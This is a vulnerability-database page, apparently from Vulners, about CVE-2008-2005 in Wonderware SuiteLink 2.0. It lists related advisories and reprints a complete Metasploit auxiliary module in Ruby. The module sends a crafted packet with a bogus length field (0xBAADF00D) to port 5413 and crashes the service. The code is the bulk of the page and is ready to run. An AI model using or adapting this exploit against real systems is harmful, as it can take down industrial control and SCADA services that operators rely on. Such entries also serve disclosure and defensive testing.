Lucene search
K

WonderWare SuiteLink 2.0 Remote Denial of Service Exploit (meta)

🗓️ 18 Sep 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 41 Views

Remote Denial of Service exploit in Wonderware SuitLink 2.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WonderWare SuiteLink 2.0 Remote Denial of Service Exploit (meta)
17 Sep 200800:00
zdt
Circl
CVE-2008-2005
17 Sep 200800:00
circl
Core Security
Wonderware SuiteLink Denial of Service vulnerability
5 May 200800:00
coresecurity
CVE
CVE-2008-2005
6 May 200815:00
cve
Cvelist
CVE-2008-2005
6 May 200815:00
cvelist
Exploit DB
WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)
17 Sep 200800:00
exploitdb
exploitpack
WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)
17 Sep 200800:00
exploitpack
NVD
CVE-2008-2005
6 May 200815:20
nvd
Packet Storm
wonderware-dos.txt
17 Sep 200800:00
packetstorm
Prion
Null pointer dereference
6 May 200815:20
prion
Rows per page

                                                ##
# $Id: suitlink.rb $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Wonderware SuitLink Denial of Service',
			'Description'    => %q{
				This module exploits a denial of service vulnerability
				within the SuitLink service in Wonderware products.
			},
			'Author'         => [ 'belay tows' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'BID', '28974' ],
					[ 'CVE', '2008-2005' ],
				],
			'DisclosureDate' => 'May 05 2008'))
			
			register_options([Opt::RPORT(5413),], self.class)
	end

	def run
		connect

		print_status("Sending DoS packet...")

        dos_length = 0xBAADF00D

		pkt =  "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F"
		pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00"
        pkt << [dos_length].pack("V")
	
        len = [pkt.length].pack("C")
		sock.put(len)
		
		sock.put(pkt)

        sleep 15 # wait to avoid thread shutdown event
		
		disconnect
	end

end
end	
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Sep 2008 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.472
41